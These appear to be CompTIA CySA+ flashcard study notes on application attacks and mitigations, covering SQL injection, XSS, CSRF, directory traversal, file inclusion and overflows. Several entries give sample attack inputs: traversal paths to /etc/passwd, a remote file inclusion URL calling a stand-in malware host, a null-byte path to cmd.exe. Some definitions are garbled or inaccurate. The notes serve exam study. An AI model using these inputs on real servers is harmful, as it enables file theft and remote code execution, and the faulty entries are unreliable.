Chapter 14 -CompTIA CySA+ Application Security and Attack Mitigation
confused deputy attack
(the point being that the user and the user's browser are not necessarily the same thing). This is in a CSRF Cross site request forgery
insecure object reference
A condition that occurs when an application externally exposes a reference to an internal object. /webpage.php/order?acctname=bob An attacker can arbitrarily change bob to alice. If the object reference is insecure, the query will still work: /webpage.php/order?acctname=alice
Secure Software Development Life Cycle (SSDLC)- 14A
A method of system development that incorporates security controls in every phase of the system's lifecycle. a process that puts security controls first and foremost mitigating security risks throughout every stage of the lifecycle each stage ensure that continuously monitored and improved throughout so that it is both functional and secure
heap overflow
A software vulnerability where input is allowed to overwrite memory locations within the area of a process's memory allocation used to store dynamically sized variables. can overwrite those variables and possibly allow arbitrary code execution.
Normalization or sanitization - 14A
A string is stripped of illegal characters or substrings and converted to the accepted character set when a character is input without the specified requirement and this will either reject or remove foreign characters characters or substrings and converted to a predetermined character set. string must be in a format that can be safely processed by input validation
Parameterized Queries- 14A
A technique that defends against SQL injection and insecure object references by incorporating placeholders in a SQL query is a form of output encoding - prepared statements - MUST USE when connecting to an SQL DATABASE
(ASLR) - address space layout randomization
A technique that randomizes where components in a running application are placed in memory to protect against buffer overflows.
cookie
A text file used to store information about a user when they visit a website. Some sites use cookies to support user sessions. A cookie is created when the server sends an HTTP response header with the cookie. Cookies are either nonpersistent (or session) cookies, in which case they are stored in memory and deleted when the browser instance is closed, persistent, in which case they are stored in the browser cache until deleted by the user or pass a defined expiration date If using SSL, information in a cookie would be secure in transit but reside on the client computer in plaintext, unless it had been separately encrypted.
Session Hijacking Attacks
A type of spoofing attack where the attacker disconnects a host then replaces it with his or her own machine, spoofing the original host's IP address. An attacker may use a fixed session ID and send that to a target. counter cookie hijacking, you can encrypt cookies during transmission, delete cookies from the client's browser cache when the client terminates the session, and design your web app to deliver a new cookie with each new session between the app and the client's browser.
File Inclusion attack
A web application vulnerability that allows an attacker either to download a file from an arbitrary location on the host file system or to upload an executable or script file to open a backdoor. the attacker adds a file to the running process of a web app or website.
To prevent SSRF vulnerabilities, web application developers should consider
Always validate user input—Ensure that all user input is properly validated and sanitized to prevent attackers from manipulating requests. Allowed (formerly known as whitelist) hosts—Web applications should only be allowed to access trusted hosts and block all other requests by default. Firewall and network segmentation—Network segmentation can prevent unauthorized access to internal systems when combined with firewalls to block traffic from unauthorized sources. Secure coding practices—Developers should follow secure coding practices, such as using well-established and trusted libraries, avoiding user-controlled data in requests, and implementing safe configuration settings.
Data Poisoning Examples
Amazon Rekognition System—Researchers demonstrated a data poisoning attack on Amazon's Rekognition facial recognition system by subtly changing a small percentage of the images used to train the system. They were able to cause the system to misidentify individuals in real-world scenarios. Google Maps—Researchers showed that by submitting many fake edits to Google Maps, they could manipulate the search results for a particular location. By making small changes to the location's data, such as changing its name or address, they could push it higher up in search results or even make it disappear altogether. Spam Filters—Researchers showed that inserting specific words into legitimate emails could bypass the spam filters used by popular email services like Gmail and Outlook. By doing so, they could send spam emails that would appear in users' inboxes without being flagged as spam.
Buffer overflow
An attack in which data goes past the boundary of the destination buffer and begins to corrupt adjacent memory. This can allow the attacker to crash the system or execute arbitrary code. a software vulnerability where a program attempts to write more data to a buffer (a temporary storage area in memory) than it can hold, causing the excess data to overflow into adjacent memory space.
Server-Side Request Forgery (SSRF)
An attack where an attacker takes advantage of the trust established between the server and the resources it can access, including itself. involves an attacker exploiting the web application's ability to send HTTP requests to other systems, which are then abused to instruct "hidden" internal or external systems to provide the attacker with access to protected features or to steal information. attack works by manipulating the input of a vulnerable web application to cause it to send an HTTP request to a server of the attacker's choice.
Input Validation - 14A
Any technique used to ensure that the data entered into a field or variable in an application is handled appropriately by that application. Can be conducted locally (on client) or remotely (on server) USE any time you take input from user (STRING INPUT) client-side validation can be easily bypassed Input validation must always occur as a server-side control. must use normalization or sanitization before being accepted
Output Encoding- 14A
Coding methods to sanitize output by converting untrusted input into a safe form where the input is displayed as data to the user without executing as code in the browser is when convert & to & or convert < to < mitigates against code injection and XSS attacks that attempt to use input to run a script USE ANYTIME YOU WANT OUTPUT FROM A USER is a defensive technique that assumes that input validation may have failed or that it might not have been possible to sanitize input. Output encoding mitigates against injection and XSS attacks that seek to use input to run a script.
Cookie Poisoning
Cookie poisoning modifies the contents of a cookie after it has been generated and sent by the web service to the client's browser so that the newly modified cookie can be used to exploit vulnerabilities in the web app. To counter cookie poisoning, you should validate the input of your web app to account for tampered-with cookies, encrypt cookies during transmission and storage, and delete cookies from the browser cache when the client terminates the session
mitigate the risk of data poisoning attacks include the following
Data Validation— it is crucial to validate the quality and authenticity of the data Data Diversity— diverse range of data can make it more difficult to manipulate the inputs to modify the results. Anomaly Detection—Using anomaly detection techniques can help identify unusual data patterns Robust Models—Creating ML models resilient to unexpected inputs and adversarial attacks Regular Model Testing and Auditing—Regularly testing and auditing ML models can help to identify issues
Cookies and Sessions
HTTP is a stateless protocol, meaning that the server preserves no information about the client.
direct object reference
In programming, a reference to the actual name of a system object that the application uses. Direct object references are typically insecure when they do not verify whether a user is authorized to access a specific object. if an attacker is able to manipulate a parameter that directly references an object, the attacker can craft that parameter to grant access to other objects the attacker would normally be unauthorized to access. SQL database may request account information by directly referencing the acctname parameter.
Structured Query Language (SQL)
To gain access to the information stored within the database SQL is one of the most widely used languages that applications use to speak to the database to perform four basic functions. selecting data from the database, inserting data into the database, deleting data from the database, and updating data within the database.
XML bomb (Billion Laughs attack)
XML encodes entities that expand to exponential sizes, consuming memory on the host and potentially crashing it.
Broken authentication- 14A
an app that fails to restrict access to protected resources A software vulnerability where the authentication mechanism allows an attacker to gain entry, such as displaying cleartext credentials, using weak session tokens, or permitting brute force login requests. No requirement for strong passwords Vulnerable password reset mechanisms that allow an attacker to reset user passwords *Unintended exposure of credentials or authorization tokens - weak cryptographic methods,storing poorly protected credential storage *An app that is vulnerable to session hijacking
Data Poisoning
an attack that involves deliberately manipulating or corrupting data used in machine learning (ML) models or artificial intelligence (AI) systems. goal of a data poisoning attack is to undermine the accuracy and reliability of the ML model and potentially cause harm or damage by making the model provide incorrect or biased results. an attacker deliberately introduces malicious or corrupted data into the training data set used to create or improve an ML model
OpenSSL cryptographic software library
an attacker can send a malformed heartbeat request that causes the server to leak up to 64 kilobytes of memory data in response, potentially revealing sensitive information.
Directory Traversal/file path traversal
application attack that allows access to commands, files, and directories that may or may not be connected to the web document root directory. is a web server vulnerability that allows an attacker to access the operating system files of the system running the web application attacker is generally seeking to modify the operation of the server in a way that allows them to take control of it. Another important variation of the directory traversal file path sequence is to use URL encoding to obscure the characters ../../, replacing them with their URL encoded equivalents %2E%2E%2F%2E%2E%2F where %2E represents . and %2F represents / https://www.foo.com/loadImage?filename=../../../etc/passwd
heap
area of memory allocated by the application during execution to store a variable.
Canonicaliztion Attack- 14A
attack method where input characters are encoded in such a way as to evade vulnerable input validations measures like ../../../../etc. will remove the ../ or %2%2%@etc/config ../ = %2
obfuscation- 14A
attack often uses this to disguise the nature of malicious inputs. swaps characters to formats still recognized by the server but more likely to be missed by application firewalls and IDS systems.
Structured Query Language (SQL) Injection
attack that injects a database query into the input data directed at a server by accessing the client side of the application. an attacker can modify one or more of these four basic functions by adding code to some input within the web app, causing it to execute the attacker's own set of queries using SQL. such as 1=1, and "--" characters. an attacker must test every single input to include elements such as URL parameters, form fields, cookies, POST data, and HTTP headers. most common methods for identifying possible SQL injection vulnerabilities in a web app is to submit a single apostrophe and then look for errors. SQL wildcard character (%) to look for a large amount of data sets, SELECT * FROM tbl_user WHERE username = 'Bob' AND password = 'Pa$$w0rd'
simple directory traversal- 14A
attack using "normal" characters looks like the following: /show=../../../../etc/config When the input is modified to use URL encoding, the input accomplished the same objective but appears much differently: /show=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/config
Prevention of XSRF
attacks is extremely difficult, as the requests tend to look similar to those made by a user of a web application performing normal actions within the application itself. solution, if implemented correctly, is to request user-specific tokens in all form submissions. the application should include a hidden input parameter with a common name such as XSRFToken. The value of this token must be randomly generated in a way that an attacker cannot guess it.
Data Protection- 14A
best practices for secure coding are outlined in several sections within this lesson and include input validation, using encryption, implementing strong authorization and authentication, proper error handling, secure storage of sensitive data, and regular testing and maintenance
Credential Stuffing- 14A
brute force attack in which stolen user account names and passwords are tested against multiple websites. use of credentials stolen from one source and trying them against multiple other sources. If they got your gmail account and uses that same username and password for your banking info.
open web application security project OWASP Testing Guide - - 14A
comprehensive guide for testing the security of web applications. designed to help developers, testers, and security professionals identify and address security vulnerabilities in web applications. provides a structured approach to web application security testing and provides specific guidance for each of the following areas
Online Password Attack- 14A
direct interaction with the authentication service - web login or vpn gateway noisy- means that clear evidence appears in logs and packet captures as rapid password failures where the attacker typically submits passwords using a pre-compiled list. must use Strong passwords, account lockouts, and multifactor authentication are effective measures to defend against these attacks.
Broken Access Control
is a type of security vulnerability that occurs when a system fails to restrict or limit access to authorized users appropriately. common vulnerability that can have severe consequences. vulnerability allows unauthorized users to gain access to sensitive or confidential information, modify or delete data, or perform other unauthorized actions.
integer overflow
is a type of software vulnerability that occurs when a program tries to store an integer value larger than the maximum value that the data type can hold, causing the value to wrap around to a lower value or overflow into adjacent memory space. this happened in 1999 NASA's Climate Orbiter To prevent integer overflow vulnerabilities, secure coding practices and techniques like input validation, range checking, and type-safe libraries ensure that integer values are correctly handled and do not exceed the maximum value the data type can hold.
Session Management - 14A
is critical to secure coding it involves managing user sessions to ensure that users are properly authenticated and authorized. Considerations for secure mgmt * Use secure session IDs -should be randomly generated long, and difficult to guess * Use secure cookies - Cookies should be marked as secure and set to HTTPS-only to prevent them from being intercepted or modified Implement session timeouts - should end automatically after a predetermined period of inactivity to prevent abuse. Use strong password policies - Strong password policies prevent attackers from easily guessing or cracking user passwords. Use multi-factor authentication - provides an additional layer of security Implement access controls - Restrict access to sensitive resources and prevent unauthorized access. ensure users cannot bypass them Protect against session hijacking and fixation - hijacking and fixation attacks involve stealing or manipulating a user's session ID - implement secure cookie-handling practices.
Cross-Site Scripting (XSS)
malicious script hosted on the attacker's site or coded in a link injected onto a trusted site designed to compromise clients browsing the trusted site, circumventing the browser's security model of trusted zones. manipulates file paths in order to control how a web application operates. XSS leverages the access a current user has to a website
Cross-Site Request Forgery (XSRF)/(CSRF)
malicious script hosted on the attacker's site that can exploit a session started on another site in the same browser. can exploit applications that use cookies to authenticate users and track sessions. attacker must convince the victim to start a session with the target site.
OWASP Testing Guide- 14A
provides guidance in these areas Information Gathering Configuration and Deployment Management Testing Identity Management Testing Input Validation Testing Testing for Error Handling and Logging Testing for Cryptography Business Logic Testing Client-side Testing Testing for Web Services Testing for Mobile Security
Prompt Injection
rely heavily on user input which vulnerabilities can pose significant risks to language models and chatbots, like Tay Chatbot, when attackers input racist and sexist remarks to manipulate its behavior and responses the importance of robust validation measures to detect and prevent such attacks.
two basic types of file inclusion: remote and local.
remote file inclusion (RFI), the attacker executes a script to inject a remote file into the web app or website. use a PHP file Hypertext Preprocessor - /webpage.php?FONT=http://www .malice.foo/malware.php local file inclusion (LFI), the attacker adds a file to the web app or website that already exists on the hosting server. often accomplished on servers that are vulnerable to directory traversal; the attacker navigates through the server's file structure and executes a file. LFI is introducing a null character (%00 in URL encoding) - /webpage.php?FONT=../../Windows/system32/cmd.exe%00
Heartbleed
security vulnerability discovered in the widely used OpenSSL cryptographic software library. bug allows an attacker to read sensitive information from the memory of a vulnerable web server, such as private keys, usernames, passwords, and other confidential data. is significant because OpenSSL is widely used for secure communication over the Internet, including for websites, email servers, and other critical applications
generation of session tokens
that will enable an attacker to predict future valid session values. If an attacker can predict the session token, then the attacker can take over a session that has yet to be established must be generated using a non-predictable algorithm session management dictates that apps limit the lifespan of a session and require reauthentication after a certain period.
syntactically correct query
the attacker uses a value that is always true, such as 1=1, and then uses the built-in capability to insert inline comments within the query by inputting the "--" characters. "--" characters are used within the SQL language to denote comments, and the SQL database query engine will ignore anything following them.
SDLC (Software Development Life Cycle)- 14A
traditional process that focuses on collecting and implementing functional users requirements software works well but not secure
Reflected XSS
type of XSS attack is like the one described above where the attack "bounces" off the web server when the link is clicked.
XML External Entity (XXE)
type of attack embeds a request for a local resource, such as the server's password file.
Persistent XSS / stored XSS,
type of attack occurs when malicious code is injected into a web application's database, which is then executed by all future visitors who view the infected page
Extensible Markup Language (XML) Attacks
used by web applications for authentication and authorizations, and for other types of data exchange and uploading. Data submitted via XML with no encryption or input validation is vulnerable to spoofing, request forgery, and injection of arbitrary data or code.
stack overflow
vulnerability occurs when a program tries to store more data in the stack than it can handle. stack is a region of memory that holds temporary data created by a program during runtime. If a program tries to store more data than the stack frame can hold, it can cause a buffer overflow, overwriting adjacent memory and potentially causing the program to crash or execute malicious code. developers must ensure that programs allocate enough memory for the stack, use safe programming practices, and use operating systems that utilize address space layout randomization (ASLR).
Password Spraying- 14A
when an attacker chooses predetermined passwords and tries them for multiple user accounts. attacker may be able to collect a list of usernames from a poorly protected directory, and the goal then becomes identifying accounts in the list with breakable or easy-to-guess passwords. A brute force attack in which multiple user accounts are tested with a dictionary of common passwords. attackers uses multiple user accounts with predetermined passwords, the attacker may already have a list of user names just need to find someone with easy passwords
On-Path Attack (formally known as a man-in-the-middle)- 14A
when an attacker intercepts communications between two endpoints to capture their traffic. include ARP spoofing and DNS spoofing (to direct traffic to a malicious website) practical way to defend against these attacks is to use encrypted communications, such as HTTPS or VPN.
